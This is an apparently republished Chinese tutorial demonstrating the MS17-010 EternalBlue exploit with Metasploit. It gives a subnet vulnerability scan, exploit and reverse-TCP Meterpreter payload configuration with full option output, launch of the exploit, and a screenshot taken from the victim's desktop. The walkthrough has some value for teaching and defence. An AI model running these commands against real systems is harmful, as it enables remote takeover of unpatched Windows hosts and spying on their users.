使用MSF对MS17-010的利用演示
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,过程:1、扫描: 信息搜集(刺探)2、漏洞利用一、首先检测网段内存在漏洞的主机系统:使用命令:msf > use auxiliary/scanner/smb/smb_ms17_010 /
千家信息网最后更新 2025年12月01日使用MSF对MS17-010的利用演示
过程:
1、扫描: 信息搜集(刺探)
2、漏洞利用
一、首先检测网段内存在漏洞的主机系统:
使用命令:
msf > use auxiliary/scanner/smb/smb_ms17_010 //加载扫描expmsf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置扫描网段msf auxiliary(scanner/smb/smb_ms17_010) > run //进行扫描
结果如下:

二、漏洞利用
msf利用命令如下:
msf > use exploit/windows/smb/ms17_010_eternalblue //加载***模块msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置***目标IPRHOSTS => 192.168.22.25msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本机IPLHOST => 192.168.5.146msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //配置回链方式payload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >
查看当前配置的payload
msf exploit(windows/smb/ms17_010_eternalblue) > show options //查看配置选项Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf exploit(windows/smb/ms17_010_eternalblue) >
发起***:
***命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit //发起***

获取对方电脑桌面:
meterpreter > screenshotScreenshot saved to: /root/RBDEvfGv.jpeg //可以到root目录下 查看对方电脑的截屏
获取shel权限
有关更多获取权限后的***技巧, 请自行百度 msf 后*** ***模块
配置
命令
漏洞
对方
权限
模块
电脑
网段
主机
信息
内存
技巧
方式
更多
桌面
目录
目标
系统
结果
过程
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
零号任务pc连接不上服务器
数据库中的空数据怎么输入
数据库的信息显示
用友t3的数据库
软件开发订单商品id如何确定
青海省虚拟服务器管理软件云主机
欣网互联网络科技公司
躲猫猫服务器地址是多少
软件开发有什么途径接单
关于网络安全的主题班会主持
佳星网络技术公司官网
神奇宝贝服务器怎么赚钱
怎样把多张图片导入数据库
骑士战争服务器
亿万互联网络科技有限公司
软件开发管理的工具
服务器免流搭建
软件开发的自我分析
浪潮服务器开发
gmod 服务器
贵阳网络安全技术培训课程
开源数据库和mysql
组织 网络安全
东莞鹏远网络技术 美团
毕业半年转行做网络安全
腾迅青年人网络安全
腾讯软件开发实习生待遇
连云港系统软件开发
网络安全教育电影附近的人
上海办公系统软件开发定制